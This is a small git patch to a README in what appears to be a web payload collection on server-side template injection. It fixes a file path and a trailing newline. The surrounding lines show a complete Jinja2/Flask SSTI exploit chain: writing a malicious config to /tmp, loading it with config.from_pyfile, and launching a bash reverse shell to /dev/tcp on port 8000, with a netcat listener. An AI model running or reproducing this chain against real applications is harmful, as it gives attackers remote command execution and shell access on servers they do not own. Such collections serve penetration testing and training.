From bb98bd93395649c38e7a398c1ecbff5070fb6197 Mon Sep 17 00:00:00 2001
From: Soka <romain.dereydellet@gmail.com>
Date: Sat, 1 Apr 2017 18:53:43 +0300
Subject: [PATCH] Add Template injections + Jinja template injection

---
 Template injections/README.md | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/Template injections/README.md b/Template injections/README.md
index f1535c4..59e9f3f 100644
--- a/Template injections/README.md	
+++ b/Template injections/README.md	
@@ -53,7 +53,7 @@ nv -lnvp 8000
 Inject this template
 ```python
 {{ ''.__class__.__mro__[2].__subclasses__()[40]('/tmp/evilconfig.cfg', 'w').write('from subprocess import check_output\n\nRUNCMD = check_output\n') }} # evil config
-{{ config.from_pyfile('/tmp/sokaexploit.cfg') }}  # load the evil config
+{{ config.from_pyfile('/tmp/evilconfig.cfg') }}  # load the evil config
 {{ config['RUNCMD']('bash -i >& /dev/tcp/xx.xx.xx.xx/8000 0>&1',shell=True) }} # connect to evil host
 ```
 
@@ -61,4 +61,4 @@ Inject this template
 [https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/](https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/)
 
 #### Training
-[https://w3challs.com/](https://w3challs.com/)
\ No newline at end of file
+[https://w3challs.com/](https://w3challs.com/)